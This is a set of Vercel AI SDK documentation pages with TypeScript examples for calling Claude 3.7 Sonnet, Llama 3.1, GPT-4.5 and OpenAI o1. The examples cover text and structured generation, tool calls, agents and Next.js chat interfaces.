// Completions API
const { text } = await generateText({
model: openai('gpt-4o'),
prompt: 'Explain the concept of quantum entanglement.',
});
// Responses API
const { text } = await generateText({
model: openai.responses('gpt-4o'),
prompt: 'Explain the concept of quantum entanglement.',
});
When using the Responses API, provider-specific options that were previously specified on the model provider instance have moved to the providerOptions object:
import { generateText } from 'ai';
import { openai } from '@ai-sdk/openai';
// Completions API
const { text } = await generateText({
model: openai('gpt-4o', { parallelToolCalls: false }),
prompt: 'Explain the concept of quantum entanglement.',
});
// Responses API
const { text } = await generateText({
model: openai.responses('gpt-4o'),
prompt: 'Explain the concept of quantum entanglement.',
providerOptions: {
openai: {
parallelToolCalls: false,
},
},
});
Get Started
Ready to get started? Here's how you can dive in:
- Explore the documentation at ai-sdk.dev/docs to understand the full capabilities of the AI SDK.
- Check out practical examples at ai-sdk.dev/examples to see the SDK in action and get inspired for your own projects.
- Dive deeper with advanced guides on topics like Retrieval-Augmented Generation (RAG) and multi-modal chat at ai-sdk.dev/docs/guides.
- Check out ready-to-deploy AI templates at vercel.com/templates?type=ai.
title: Get started with Claude 3.7 Sonnet description: Get started with Claude 3.7 Sonnet using the AI SDK. tags: ['getting-started']
Get started with Claude 3.7 Sonnet
With the release of Claude 3.7 Sonnet, there has never been a better time to start building AI applications, particularly those that require complex reasoning capabilities.
The AI SDK is a powerful TypeScript toolkit for building AI applications with large language models (LLMs) like Claude 3.7 Sonnet alongside popular frameworks like React, Next.js, Vue, Svelte, Node.js, and more.
Claude 3.7 Sonnet
Claude 3.7 Sonnet is Anthropic's most intelligent model to date and the first Claude model to offer extended thinking—the ability to solve complex problems with careful, step-by-step reasoning. With Claude 3.7 Sonnet, you can balance speed and quality by choosing between standard thinking for near-instant responses or extended thinking for advanced reasoning. Claude 3.7 Sonnet is state-of-the-art for coding, and delivers advancements in computer use, agentic capabilities, complex reasoning, and content generation. With frontier performance and more control over speed, Claude 3.7 Sonnet is a great choice for powering AI agents, especially customer-facing agents, and complex AI workflows.
Getting Started with the AI SDK
The AI SDK is the TypeScript toolkit designed to help developers build AI-powered applications with React, Next.js, Vue, Svelte, Node.js, and more. Integrating LLMs into applications is complicated and heavily dependent on the specific model provider you use.
The AI SDK abstracts away the differences between model providers, eliminates boilerplate code for building chatbots, and allows you to go beyond text output to generate rich, interactive components.
At the center of the AI SDK is AI SDK Core, which provides a unified API to call any LLM. The code snippet below is all you need to call Claude 3.7 Sonnet with the AI SDK:
import { anthropic } from '@ai-sdk/anthropic';
import { generateText } from 'ai';
const { text, reasoning, reasoningDetails } = await generateText({
model: anthropic('claude-3-7-sonnet-20250219'),
prompt: 'How many people will live in the world in 2040?',
});
console.log(text); // text response
The unified interface also means that you can easily switch between providers by changing just two lines of code. For example, to use Claude 3.7 Sonnet via Amazon Bedrock:
import { bedrock } from '@ai-sdk/amazon-bedrock';
import { generateText } from 'ai';
const { reasoning, text } = await generateText({
model: bedrock('anthropic.claude-3-7-sonnet-20250219-v1:0'),
prompt: 'How many people will live in the world in 2040?',
});
Reasoning Ability
Claude 3.7 Sonnet introduces extended thinking: the ability to solve complex problems with careful, step-by-step reasoning. You can enable it using the thinking provider option and specifying a thinking budget in tokens:
import { anthropic, AnthropicProviderOptions } from '@ai-sdk/anthropic';
import { generateText } from 'ai';
const { text, reasoning, reasoningDetails } = await generateText({
model: anthropic('claude-3-7-sonnet-20250219'),
prompt: 'How many people will live in the world in 2040?',
providerOptions: {
anthropic: {
thinking: { type: 'enabled', budgetTokens: 12000 },
} satisfies AnthropicProviderOptions,
},
});
console.log(reasoning); // reasoning text
console.log(reasoningDetails); // reasoning details including redacted reasoning
console.log(text); // text response
Building Interactive Interfaces
AI SDK Core can be paired with AI SDK UI, another powerful component of the AI SDK, to streamline the process of building chat, completion, and assistant interfaces with popular frameworks like Next.js, Nuxt, and SvelteKit.
AI SDK UI provides robust abstractions that simplify the complex tasks of managing chat streams and UI updates on the frontend, enabling you to develop dynamic AI-driven interfaces more efficiently.
With its main hooks (useChat, useCompletion, and useObject), you can incorporate real-time chat capabilities, text completions, streamed JSON, and interactive assistant features into your app.
Let's explore building a chatbot with Next.js, the AI SDK, and Claude 3.7 Sonnet:
In a new Next.js application, first install the AI SDK and the Anthropic provider:
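For example, with pnpm (npm, yarn, and bun work analogously; the packages match the imports used in the snippets below):
pnpm add ai @ai-sdk/anthropic @ai-sdk/react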
Then, create a route handler for the chat endpoint:
import { anthropic, AnthropicProviderOptions } from '@ai-sdk/anthropic';
import { streamText, UIMessage, convertToModelMessages } from 'ai';
export async function POST(req: Request) {
const { messages }: { messages: UIMessage[] } = await req.json();
const result = streamText({
model: anthropic('claude-3-7-sonnet-20250219'),
messages: convertToModelMessages(messages),
providerOptions: {
anthropic: {
thinking: { type: 'enabled', budgetTokens: 12000 },
} satisfies AnthropicProviderOptions,
},
});
return result.toUIMessageStreamResponse({
sendReasoning: true,
});
}
Finally, update the root page (app/page.tsx) to use the useChat hook:
'use client';
import { useChat } from '@ai-sdk/react';
export default function Page() {
const { messages, input, handleInputChange, handleSubmit, error } = useChat();
return (
<>
{messages.map(message => (
<div key={message.id}>
{message.role === 'user' ? 'User: ' : 'AI: '}
{message.parts.map((part, index) => {
// text parts:
if (part.type === 'text') {
return <div key={index}>{part.text}</div>;
}
// reasoning parts:
if (part.type === 'reasoning') {
return (
<pre key={index}>
{part.details.map(detail =>
detail.type === 'text' ? detail.text : '<redacted>',
)}
</pre>
);
}
})}
</div>
))}
<form onSubmit={handleSubmit}>
<input name="prompt" value={input} onChange={handleInputChange} />
<button type="submit">Submit</button>
</form>
</>
);
}
The useChat hook on your root page (app/page.tsx) will make a request to your AI provider endpoint (app/api/chat/route.ts) whenever the user submits a message. The messages are then displayed in the chat UI.
Get Started
Ready to dive in? Here's how you can begin:
- Explore the documentation at ai-sdk.dev/docs to understand the capabilities of the AI SDK.
- Check out practical examples at ai-sdk.dev/examples to see the SDK in action.
- Dive deeper with advanced guides on topics like Retrieval-Augmented Generation (RAG) at ai-sdk.dev/docs/guides.
- Use ready-to-deploy AI templates at vercel.com/templates?type=ai.
Claude 3.7 Sonnet opens new opportunities for reasoning-intensive AI applications. Start building today and leverage the power of advanced reasoning in your AI projects.
title: Get started with Llama 3.1 description: Get started with Llama 3.1 using the AI SDK. tags: ['getting-started']
Get started with Llama 3.1
With the release of Llama 3.1, there has never been a better time to start building AI applications.
The AI SDK is a powerful TypeScript toolkit for building AI applications with large language models (LLMs) like Llama 3.1 alongside popular frameworks like React, Next.js, Vue, Svelte, Node.js, and more.
Llama 3.1
The release of Meta's Llama 3.1 is an important moment in AI development. As the first state-of-the-art open-weight AI model, Llama 3.1 is helping accelerate how developers build AI apps. Available in 8B, 70B, and 405B sizes, these instruction-tuned models work well for tasks like dialogue generation, translation, reasoning, and code generation.
Benchmarks
Llama 3.1 surpasses most available open-source chat models on common industry benchmarks and even outperforms some closed-source models, offering superior performance in language nuances, contextual understanding, and complex multi-step tasks. The models' refined post-training processes significantly improve response alignment, reduce false refusal rates, and enhance answer diversity, making Llama 3.1 a powerful and accessible tool for building generative AI applications.
Source: Meta AI - Llama 3.1 Model Card
Choosing Model Size
Llama 3.1 includes a new 405B parameter model, becoming the largest open-source model available today. This model is designed to handle the most complex and demanding tasks.
When choosing between the different sizes of Llama 3.1 models (405B, 70B, 8B), consider the trade-off between performance and computational requirements. The 405B model offers the highest accuracy and capability for complex tasks but requires significant computational resources. The 70B model provides a good balance of performance and efficiency for most applications, while the 8B model is suitable for simpler tasks or resource-constrained environments where speed and lower computational overhead are priorities.
Getting Started with the AI SDK
The AI SDK is the TypeScript toolkit designed to help developers build AI-powered applications with React, Next.js, Vue, Svelte, Node.js, and more. Integrating LLMs into applications is complicated and heavily dependent on the specific model provider you use.
The AI SDK abstracts away the differences between model providers, eliminates boilerplate code for building chatbots, and allows you to go beyond text output to generate rich, interactive components.
At the center of the AI SDK is AI SDK Core, which provides a unified API to call any LLM. The code snippet below is all you need to call Llama 3.1 (using DeepInfra) with the AI SDK:
import { deepinfra } from '@ai-sdk/deepinfra';
import { generateText } from 'ai';
const { text } = await generateText({
model: deepinfra('meta-llama/Meta-Llama-3.1-405B-Instruct'),
prompt: 'What is love?',
});
AI SDK Core abstracts away the differences between model providers, allowing you to focus on building great applications. Prefer to use Amazon Bedrock? The unified interface also means that you can easily switch between models by changing just two lines of code.
import { generateText } from 'ai';
import { bedrock } from '@ai-sdk/amazon-bedrock';
const { text } = await generateText({
model: bedrock('meta.llama3-1-405b-instruct-v1:0'),
prompt: 'What is love?',
});
Streaming the Response
To stream the model's response as it's being generated, update your code snippet to use the streamText function.
import { streamText } from 'ai';
import { deepinfra } from '@ai-sdk/deepinfra';
const { textStream } = streamText({
model: deepinfra('meta-llama/Meta-Llama-3.1-405B-Instruct'),
prompt: 'What is love?',
});
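The returned textStream is an async iterable, so you can print the response as it arrives. A minimal sketch (assuming a Node.js environment):
for await (const textPart of textStream) {
process.stdout.write(textPart);
}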
Generating Structured Data
While text generation can be useful, you might want to generate structured JSON data. For example, you might want to extract information from text, classify data, or generate synthetic data. AI SDK Core provides two functions (generateObject and streamObject) to generate structured data, allowing you to constrain model outputs to a specific schema.
import { generateObject } from 'ai';
import { deepinfra } from '@ai-sdk/deepinfra';
import { z } from 'zod';
const { object } = await generateObject({
model: deepinfra('meta-llama/Meta-Llama-3.1-70B-Instruct'),
schema: z.object({
recipe: z.object({
name: z.string(),
ingredients: z.array(z.object({ name: z.string(), amount: z.string() })),
steps: z.array(z.string()),
}),
}),
prompt: 'Generate a lasagna recipe.',
});
This code snippet will generate a type-safe recipe that conforms to the specified zod schema.
Tools
While LLMs have incredible generation capabilities, they struggle with discrete tasks (e.g. mathematics) and interacting with the outside world (e.g. getting the weather). The solution: tools, which are like programs that you provide to the model, which it can choose to call as necessary.
Using Tools with the AI SDK
The AI SDK supports tool usage across several of its functions, including generateText and streamUI. By passing one or more tools to the tools parameter, you can extend the capabilities of LLMs, allowing them to perform discrete tasks and interact with external systems.
Here's an example of how you can use a tool with the AI SDK and Llama 3.1:
import { generateText, tool } from 'ai';
import { deepinfra } from '@ai-sdk/deepinfra';
import { z } from 'zod';
const { text } = await generateText({
model: deepinfra('meta-llama/Meta-Llama-3.1-70B-Instruct'),
prompt: 'What is the weather like today?',
tools: {
getWeather: tool({
description: 'Get the weather in a location',
parameters: z.object({
location: z.string().describe('The location to get the weather for'),
}),
execute: async ({ location }) => ({
location,
temperature: 72 + Math.floor(Math.random() * 21) - 10,
}),
}),
},
});
In this example, the getWeather tool allows the model to fetch real-time weather data, enhancing its ability to provide accurate and up-to-date information.
Agents
Agents take your AI applications a step further by allowing models to execute multiple steps (i.e. tools) in a non-deterministic way, making decisions based on context and user input.
Agents use LLMs to choose the next step in a problem-solving process. They can reason at each step and make decisions based on the evolving context.
Implementing Agents with the AI SDK
The AI SDK supports agent implementation through the maxSteps parameter. This allows the model to make multiple decisions and tool calls in a single interaction.
Here's an example of an agent that solves math problems:
import { generateText, tool } from 'ai';
import { deepinfra } from '@ai-sdk/deepinfra';
import * as mathjs from 'mathjs';
import { z } from 'zod';
const problem =
'Calculate the profit for a day if revenue is $5000 and expenses are $3500.';
const { text: answer } = await generateText({
model: deepinfra('meta-llama/Meta-Llama-3.1-70B-Instruct'),
system:
'You are solving math problems. Reason step by step. Use the calculator when necessary.',
prompt: problem,
tools: {
calculate: tool({
description: 'A tool for evaluating mathematical expressions.',
parameters: z.object({ expression: z.string() }),
execute: async ({ expression }) => mathjs.evaluate(expression),
}),
},
maxSteps: 5,
});
In this example, the agent can use the calculator tool multiple times if needed, reasoning through the problem step by step.
Building Interactive Interfaces
AI SDK Core can be paired with AI SDK UI, another powerful component of the AI SDK, to streamline the process of building chat, completion, and assistant interfaces with popular frameworks like Next.js, Nuxt, and SvelteKit.
AI SDK UI provides robust abstractions that simplify the complex tasks of managing chat streams and UI updates on the frontend, enabling you to develop dynamic AI-driven interfaces more efficiently.
With its main hooks (useChat, useCompletion, and useObject), you can incorporate real-time chat capabilities, text completions, streamed JSON, and interactive assistant features into your app.
Let's explore building a chatbot with Next.js, the AI SDK, and Llama 3.1 (via DeepInfra):
import { deepinfra } from '@ai-sdk/deepinfra';
import { convertToModelMessages, streamText } from 'ai';
// Allow streaming responses up to 30 seconds
export const maxDuration = 30;
export async function POST(req: Request) {
const { messages } = await req.json();
const result = streamText({
model: deepinfra('meta-llama/Meta-Llama-3.1-70B-Instruct'),
messages: convertToModelMessages(messages),
});
return result.toUIMessageStreamResponse();
}
'use client';
import { useChat } from '@ai-sdk/react';
export default function Page() {
const { messages, input, handleInputChange, handleSubmit } = useChat();
return (
<>
{messages.map(message => (
<div key={message.id}>
{message.role === 'user' ? 'User: ' : 'AI: '}
{message.content}
</div>
))}
<form onSubmit={handleSubmit}>
<input name="prompt" value={input} onChange={handleInputChange} />
<button type="submit">Submit</button>
</form>
</>
);
}
The useChat hook on your root page (app/page.tsx) will make a request to your AI provider endpoint (app/api/chat/route.ts) whenever the user submits a message. The messages are then streamed back in real-time and displayed in the chat UI.
This enables a seamless chat experience where the user can see the AI response as soon as it is available, without having to wait for the entire response to be received.
Going Beyond Text
The AI SDK's React Server Components (RSC) API enables you to create rich, interactive interfaces that go beyond simple text generation. With the streamUI function, you can dynamically stream React components from the server to the client.
Let's dive into how you can leverage tools with AI SDK RSC to build a generative user interface with Next.js (App Router).
First, create a Server Action.
'use server';
import { streamUI } from '@ai-sdk/rsc';
import { deepinfra } from '@ai-sdk/deepinfra';
import { z } from 'zod';
export async function streamComponent() {
const result = await streamUI({
model: deepinfra('meta-llama/Meta-Llama-3.1-70B-Instruct'),
prompt: 'Get the weather for San Francisco',
text: ({ content }) => <div>{content}</div>,
tools: {
getWeather: {
description: 'Get the weather for a location',
parameters: z.object({ location: z.string() }),
generate: async function* ({ location }) {
yield <div>loading...</div>;
const weather = '25c'; // await getWeather(location);
return (
<div>
the weather in {location} is {weather}.
</div>
);
},
},
},
});
return result.value;
}
In this example, if the model decides to use the getWeather tool, it will first yield a div while fetching the weather data, then return a weather component with the fetched data (note: static data in this example). This allows for a more dynamic and responsive UI that can adapt based on the AI's decisions and external data.
On the frontend, you can call this Server Action like any other asynchronous function in your application. In this case, the function returns a regular React component.
'use client';
import { useState } from 'react';
import { streamComponent } from './actions';
export default function Page() {
const [component, setComponent] = useState<React.ReactNode>();
return (
<div>
<form
onSubmit={async e => {
e.preventDefault();
setComponent(await streamComponent());
}}
>
<button>Stream Component</button>
</form>
<div>{component}</div>
</div>
);
}
To see AI SDK RSC in action, check out our open-source Next.js Gemini Chatbot.
Migrate from OpenAI
One of the key advantages of the AI SDK is its unified API, which makes it incredibly easy to switch between different AI models and providers. This flexibility is particularly useful when you want to migrate from one model to another, such as moving from OpenAI's GPT models to Meta's Llama models hosted on DeepInfra.
Here's how simple the migration process can be:
OpenAI Example:
import { generateText } from 'ai';
import { openai } from '@ai-sdk/openai';
const { text } = await generateText({
model: openai('gpt-4.1'),
prompt: 'What is love?',
});
Llama on DeepInfra Example:
import { generateText } from 'ai';
import { deepinfra } from '@ai-sdk/deepinfra';
const { text } = await generateText({
model: deepinfra('meta-llama/Meta-Llama-3.1-70B-Instruct'),
prompt: 'What is love?',
});
Thanks to the unified API, the core structure of the code remains the same. The main differences are:
- Creating a DeepInfra client
- Changing the model name from openai('gpt-4.1') to deepinfra('meta-llama/Meta-Llama-3.1-70B-Instruct')
With just these few changes, you've migrated from OpenAI's GPT-4.1 to Meta's Llama 3.1 hosted on DeepInfra. The generateText function and its usage remain identical, showcasing the power of the AI SDK's unified API.
This feature allows you to easily experiment with different models, compare their performance, and choose the best one for your specific use case without having to rewrite large portions of your codebase.
Prompt Engineering and Fine-tuning
While the Llama 3.1 family of models is powerful out of the box, its performance can be enhanced through effective prompt engineering and fine-tuning techniques.
Prompt Engineering
Prompt engineering is the practice of crafting input prompts to elicit desired outputs from language models. It involves structuring and phrasing prompts in ways that guide the model towards producing more accurate, relevant, and coherent responses.
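For example, a structured prompt can pair a clear system instruction with delimited input. A minimal sketch (the instruction, tags, and sample content below are our own illustration):
import { generateText } from 'ai';
import { deepinfra } from '@ai-sdk/deepinfra';
// Illustrative user content, wrapped in XML-style tags to mark its boundaries
const review = 'The battery lasts two days, but the camera struggles in low light.';
const { text } = await generateText({
model: deepinfra('meta-llama/Meta-Llama-3.1-70B-Instruct'),
system: 'You are a product analyst. Summarize the review inside <review> tags in one sentence.',
prompt: `<review>${review}</review>`,
});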
For more information on prompt engineering techniques (specific to Llama models), check out these resources:
Fine-tuning
Fine-tuning involves further training a pre-trained model on a specific dataset or task to customize its performance for particular use cases. This process allows you to adapt Llama 3.1 to your specific domain or application, potentially improving its accuracy and relevance for your needs.
To learn more about fine-tuning Llama models, check out these resources:
- Official Fine-tuning Llama Guide
- Fine-tuning and Inference with Llama 3
- Fine-tuning Models with Fireworks AI
- Fine-tuning Llama with Modal
Conclusion
The AI SDK offers a powerful and flexible way to integrate cutting-edge AI models like Llama 3.1 into your applications. With AI SDK Core, you can seamlessly switch between different AI models and providers by changing just two lines of code. This flexibility allows for quick experimentation and adaptation, reducing the time required to change models from days to minutes.
The AI SDK ensures that your application remains clean and modular, accelerating development and future-proofing against the rapidly evolving landscape.
Ready to get started? Here's how you can dive in:
- Explore the documentation at ai-sdk.dev/docs to understand the full capabilities of the AI SDK.
- Check out practical examples at ai-sdk.dev/examples to see the SDK in action and get inspired for your own projects.
- Dive deeper with advanced guides on topics like Retrieval-Augmented Generation (RAG) and multi-modal chat at ai-sdk.dev/docs/guides.
- Check out ready-to-deploy AI templates at vercel.com/templates?type=ai.
title: Get started with GPT-4.5 description: Get started with GPT-4.5 using the AI SDK. tags: ['getting-started']
Get started with OpenAI GPT-4.5
With the release of OpenAI's GPT-4.5 model, there has never been a better time to start building AI applications, particularly those that require a deeper understanding of the world.
The AI SDK is a powerful TypeScript toolkit for building AI applications with large language models (LLMs) like OpenAI GPT-4.5 alongside popular frameworks like React, Next.js, Vue, Svelte, Node.js, and more.
OpenAI GPT-4.5
OpenAI recently released GPT-4.5, their largest and best model for chat yet. GPT‑4.5 is a step forward in scaling up pretraining and post-training. By scaling unsupervised learning, GPT‑4.5 improves its ability to recognize patterns, draw connections, and generate creative insights without reasoning.
Based on early testing, developers may find GPT‑4.5 particularly useful for applications that benefit from its higher emotional intelligence and creativity such as writing help, communication, learning, coaching, and brainstorming. It also shows strong capabilities in agentic planning and execution, including multi-step coding workflows and complex task automation.
Benchmarks
GPT-4.5 demonstrates impressive performance across various benchmarks:
- SimpleQA Accuracy: 62.5% (higher is better)
- SimpleQA Hallucination Rate: 37.1% (lower is better)
Prompt Engineering for GPT-4.5
GPT-4.5 performs best with the following approach:
- Be clear and specific: GPT-4.5 responds well to direct, well-structured prompts.
- Use delimiters for clarity: Use delimiters like triple quotation marks, XML tags, or section titles to clearly indicate distinct parts of the input.
Getting Started with the AI SDK
The AI SDK is the TypeScript toolkit designed to help developers build AI-powered applications with React, Next.js, Vue, Svelte, Node.js, and more. Integrating LLMs into applications is complicated and heavily dependent on the specific model provider you use.
The AI SDK abstracts away the differences between model providers, eliminates boilerplate code for building chatbots, and allows you to go beyond text output to generate rich, interactive components.
At the center of the AI SDK is AI SDK Core, which provides a unified API to call any LLM. The code snippet below is all you need to call OpenAI GPT-4.5 with the AI SDK:
import { generateText } from 'ai';
import { openai } from '@ai-sdk/openai';
const { text } = await generateText({
model: openai('gpt-4.5-preview'),
prompt: 'Explain the concept of quantum entanglement.',
});
Generating Structured Data
While text generation can be useful, you might want to generate structured JSON data. For example, you might want to extract information from text, classify data, or generate synthetic data. AI SDK Core provides two functions (generateObject and streamObject) to generate structured data, allowing you to constrain model outputs to a specific schema.
import { generateObject } from 'ai';
import { openai } from '@ai-sdk/openai';
import { z } from 'zod';
const { object } = await generateObject({
model: openai('gpt-4.5-preview'),
schema: z.object({
recipe: z.object({
name: z.string(),
ingredients: z.array(z.object({ name: z.string(), amount: z.string() })),
steps: z.array(z.string()),
}),
}),
prompt: 'Generate a lasagna recipe.',
});
This code snippet will generate a type-safe recipe that conforms to the specified zod schema.
Using Tools with the AI SDK
GPT-4.5 supports tool calling out of the box, allowing it to interact with external systems and perform discrete tasks. Here's an example of using tool calling with the AI SDK:
import { generateText, tool } from 'ai';
import { openai } from '@ai-sdk/openai';
import { z } from 'zod';
const { text } = await generateText({
model: openai('gpt-4.5-preview'),
prompt: 'What is the weather like today in San Francisco?',
tools: {
getWeather: tool({
description: 'Get the weather in a location',
parameters: z.object({
location: z.string().describe('The location to get the weather for'),
}),
execute: async ({ location }) => ({
location,
temperature: 72 + Math.floor(Math.random() * 21) - 10,
}),
}),
},
});
In this example, the getWeather tool allows the model to fetch real-time weather data (simulated for simplicity), enhancing its ability to provide accurate and up-to-date information.
Building Interactive Interfaces
AI SDK Core can be paired with AI SDK UI, another powerful component of the AI SDK, to streamline the process of building chat, completion, and assistant interfaces with popular frameworks like Next.js, Nuxt, and SvelteKit.
AI SDK UI provides robust abstractions that simplify the complex tasks of managing chat streams and UI updates on the frontend, enabling you to develop dynamic AI-driven interfaces more efficiently.
With its main hooks (useChat, useCompletion, and useObject), you can incorporate real-time chat capabilities, text completions, streamed JSON, and interactive assistant features into your app.
Let's explore building a chatbot with Next.js, the AI SDK, and OpenAI GPT-4.5:
In a new Next.js application, first install the AI SDK and the OpenAI provider:
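For example, with pnpm (npm, yarn, and bun work analogously):
pnpm add ai @ai-sdk/openai @ai-sdk/react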
Then, create a route handler for the chat endpoint:
import { openai } from '@ai-sdk/openai';
import { convertToModelMessages, streamText, UIMessage } from 'ai';
// Allow responses up to 30 seconds
export const maxDuration = 30;
export async function POST(req: Request) {
const { messages }: { messages: UIMessage[] } = await req.json();
const result = streamText({
model: openai('gpt-4.5-preview'),
messages: convertToModelMessages(messages),
});
return result.toUIMessageStreamResponse();
}
Finally, update the root page (app/page.tsx) to use the useChat hook:
'use client';
import { useChat } from '@ai-sdk/react';
export default function Page() {
const { messages, input, handleInputChange, handleSubmit, error } = useChat();
return (
<>
{messages.map(message => (
<div key={message.id}>
{message.role === 'user' ? 'User: ' : 'AI: '}
{message.content}
</div>
))}
<form onSubmit={handleSubmit}>
<input name="prompt" value={input} onChange={handleInputChange} />
<button type="submit">Submit</button>
</form>
</>
);
}
The useChat hook on your root page (app/page.tsx) will make a request to your AI provider endpoint (app/api/chat/route.ts) whenever the user submits a message. The messages are then displayed in the chat UI.
Get Started
Ready to get started? Here's how you can dive in:
- Explore the documentation at ai-sdk.dev/docs to understand the full capabilities of the AI SDK.
- Check out practical examples at ai-sdk.dev/examples to see the SDK in action and get inspired for your own projects.
- Dive deeper with advanced guides on topics like Retrieval-Augmented Generation (RAG) and multi-modal chat at ai-sdk.dev/docs/guides.
- Check out ready-to-deploy AI templates at vercel.com/templates?type=ai.
title: Get started with OpenAI o1 description: Get started with OpenAI o1 using the AI SDK. tags: ['getting-started', 'reasoning']
Get started with OpenAI o1
With the release of OpenAI's o1 series models, there has never been a better time to start building AI applications, particularly those that require complex reasoning capabilities.
The AI SDK is a powerful TypeScript toolkit for building AI applications with large language models (LLMs) like OpenAI o1 alongside popular frameworks like React, Next.js, Vue, Svelte, Node.js, and more.
OpenAI o1
OpenAI released a series of AI models designed to spend more time thinking before responding. They can reason through complex tasks and solve harder problems than previous models in science, coding, and math. These models, named the o1 series, are trained with reinforcement learning and can "think before they answer". As a result, they are able to produce a long internal chain of thought before responding to a prompt.
There are three reasoning models available in the API:
- o1: Designed to reason about hard problems using broad general knowledge about the world.
- o1-preview: The original preview version of o1 - slower than o1 but supports streaming.
- o1-mini: A faster and cheaper version of o1, particularly adept at coding, math, and science tasks where extensive general knowledge isn't required. o1-mini supports streaming.
| Model | Streaming | Tools | Object Generation | Reasoning Effort |
|---|---|---|---|---|
| o1 | ✓ | ✓ | ✓ | ✓ |
| o1-preview | ✓ | ✗ | ✗ | ✗ |
| o1-mini | ✓ | ✗ | ✗ | ✗ |
Benchmarks
OpenAI o1 models excel in scientific reasoning, with impressive performance across various domains:
- Ranking in the 89th percentile on competitive programming questions (Codeforces)
- Placing among the top 500 students in the US in a qualifier for the USA Math Olympiad (AIME)
- Exceeding human PhD-level accuracy on a benchmark of physics, biology, and chemistry problems (GPQA)
Prompt Engineering for o1 Models
The o1 models perform best with straightforward prompts. Some prompt engineering techniques, like few-shot prompting or instructing the model to "think step by step," may not enhance performance and can sometimes hinder it. Here are some best practices:
- Keep prompts simple and direct: The models excel at understanding and responding to brief, clear instructions without the need for extensive guidance.
- Avoid chain-of-thought prompts: Since these models perform reasoning internally, prompting them to "think step by step" or "explain your reasoning" is unnecessary.
- Use delimiters for clarity: Use delimiters like triple quotation marks, XML tags, or section titles to clearly indicate distinct parts of the input, helping the model interpret different sections appropriately (see the sketch after this list).
- Limit additional context in retrieval-augmented generation (RAG): When providing additional context or documents, include only the most relevant information to prevent the model from overcomplicating its response.
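To make the delimiter advice concrete, here is a minimal sketch (the reference text and prompt wording are our own illustration):
import { generateText } from 'ai';
import { openai } from '@ai-sdk/openai';
// Illustrative reference text to summarize
const report = 'Quantum entanglement links the measured states of two particles, even when they are far apart.';
const { text } = await generateText({
model: openai('o1'),
// Triple quotation marks delimit the reference text from the instruction
prompt: `Summarize the text delimited by triple quotes in one sentence.\n\n"""${report}"""`,
});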
Getting Started with the AI SDK
The AI SDK is the TypeScript toolkit designed to help developers build AI-powered applications with React, Next.js, Vue, Svelte, Node.js, and more. Integrating LLMs into applications is complicated and heavily dependent on the specific model provider you use.
The AI SDK abstracts away the differences between model providers, eliminates boilerplate code for building chatbots, and allows you to go beyond text output to generate rich, interactive components.
At the center of the AI SDK is AI SDK Core, which provides a unified API to call any LLM. The code snippet below is all you need to call OpenAI o1-mini with the AI SDK:
import { generateText } from 'ai';
import { openai } from '@ai-sdk/openai';
const { text } = await generateText({
model: openai('o1-mini'),
prompt: 'Explain the concept of quantum entanglement.',
});
AI SDK Core abstracts away the differences between model providers, allowing you to focus on building great applications. The unified interface also means that you can easily switch between models by changing just one line of code.
import { generateText } from 'ai';
import { openai } from '@ai-sdk/openai';
const { text } = await generateText({
model: openai('o1'),
prompt: 'Explain the concept of quantum entanglement.',
});
Refining Reasoning Effort
You can control the amount of reasoning effort expended by o1 through the reasoningEffort parameter.
This parameter can be set to 'low', 'medium', or 'high' to adjust how much time and computation the model spends on internal reasoning before producing a response.
import { generateText } from 'ai';
import { openai } from '@ai-sdk/openai';
// Reduce reasoning effort for faster responses
const { text } = await generateText({
model: openai('o1'),
prompt: 'Explain quantum entanglement briefly.',
providerOptions: {
openai: { reasoningEffort: 'low' },
},
});
Generating Structured Data
While text generation can be useful, you might want to generate structured JSON data. For example, you might want to extract information from text, classify data, or generate synthetic data. AI SDK Core provides two functions (generateObject and streamObject) to generate structured data, allowing you to constrain model outputs to a specific schema.
import { generateObject } from 'ai';
import { openai } from '@ai-sdk/openai';
import { z } from 'zod';
const { object } = await generateObject({
model: openai('o1'),
schema: z.object({
recipe: z.object({
name: z.string(),
ingredients: z.array(z.object({ name: z.string(), amount: z.string() })),
steps: z.array(z.string()),
}),
}),
prompt: 'Generate a lasagna recipe.',
});
This code snippet will generate a type-safe recipe that conforms to the specified zod schema.
Tools
While LLMs have incredible generation capabilities, they struggle with discrete tasks (e.g. mathematics) and interacting with the outside world (e.g. getting the weather). The solution: tools, which are like programs that you provide to the model, which it can choose to call as necessary.
Using Tools with the AI SDK
The AI SDK supports tool usage across several of its functions, like generateText and streamText. By passing one or more tools to the tools parameter, you can extend the capabilities of LLMs, allowing them to perform discrete tasks and interact with external systems.
Here's an example of how you can use a tool with the AI SDK and o1:
import { generateText, tool } from 'ai';
import { openai } from '@ai-sdk/openai';
import { z } from 'zod';
const { text } = await generateText({
model: openai('o1'),
prompt: 'What is the weather like today?',
tools: {
getWeather: tool({
description: 'Get the weather in a location',
parameters: z.object({
location: z.string().describe('The location to get the weather for'),
}),
execute: async ({ location }) => ({
location,
temperature: 72 + Math.floor(Math.random() * 21) - 10,
}),
}),
},
});
In this example, the getWeather tool allows the model to fetch real-time weather data (simulated for simplicity), enhancing its ability to provide accurate and up-to-date information.
Tools are only compatible with o1, not o1-preview or o1-mini.
Building Interactive Interfaces
AI SDK Core can be paired with AI SDK UI, another powerful component of the AI SDK, to streamline the process of building chat, completion, and assistant interfaces with popular frameworks like Next.js, Nuxt, and SvelteKit.
AI SDK UI provides robust abstractions that simplify the complex tasks of managing chat streams and UI updates on the frontend, enabling you to develop dynamic AI-driven interfaces more efficiently.
With its main hooks (useChat, useCompletion, and useObject), you can incorporate real-time chat capabilities, text completions, streamed JSON, and interactive assistant features into your app.
Let's explore building a chatbot with Next.js, the AI SDK, and OpenAI o1:
import { openai } from '@ai-sdk/openai';
import { convertToModelMessages, streamText, UIMessage } from 'ai';
// Allow responses up to 5 minutes
export const maxDuration = 300;
export async function POST(req: Request) {
const { messages }: { messages: UIMessage[] } = await req.json();
const result = streamText({
model: openai('o1-mini'),
messages: convertToModelMessages(messages),
});
return result.toUIMessageStreamResponse();
}
'use client';
import { useChat } from '@ai-sdk/react';
export default function Page() {
const { messages, input, handleInputChange, handleSubmit, error } = useChat();
return (
<>
{messages.map(message => (
<div key={message.id}>
{message.role === 'user' ? 'User: ' : 'AI: '}
{message.content}
</div>
))}
<form onSubmit={handleSubmit}>
<input name="prompt" value={input} onChange={handleInputChange} />
<button type="submit">Submit</button>
</form>
</>
);
}
The useChat hook on your root page (app/page.tsx) will make a request to your AI provider endpoint (app/api/chat/route.ts) whenever the user submits a message. The messages are then displayed in the chat UI.
Get Started
Ready to get started? Here's how you can dive in:
- Explore the documentation at ai-sdk.dev/docs to understand the full capabilities of the AI SDK.
